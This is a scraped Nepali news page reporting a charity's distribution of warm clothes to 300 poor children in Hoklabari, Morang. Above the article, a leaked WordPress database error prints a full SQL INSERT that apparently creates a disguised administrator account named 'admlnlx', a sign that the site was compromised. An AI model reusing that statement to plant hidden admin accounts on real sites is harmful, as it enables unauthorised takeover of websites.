WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9xkvQYvtO34RTtzTt/.o8NAMASlfM1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:11:59', '', 'admlnlx', 'admlnlx')
उर्लाबारी (मोरङ), मंसिर २८ –
होक्लाबारीमा रहेका तीन सय गरिब बालबालिकालाई सोमबार रु चार लाख बराबरको न्यानो कपडा वितरण गरिएको छ ।
इसाई धर्मका अनुयायीद्वारा स्थापित काठमाडौँस्थित ‘आशाको किरण’ नामक संस्थाले होक्लाबारी–२ स्थित होक्लाबारी माविमा गाविसका ६, ७, ८ र ९ नं वडाका गरिब तथा विपन्न परिवारका बालबालिकालाई झोला, कम्बल, जम्पर, ट्र्याक सुट लगायत न्यानो कपडा वितरण गरिएको संस्थाका कार्यक्रम संयोजक दीपक न्यौपानेले जानकारी दिनुभयो । – रासस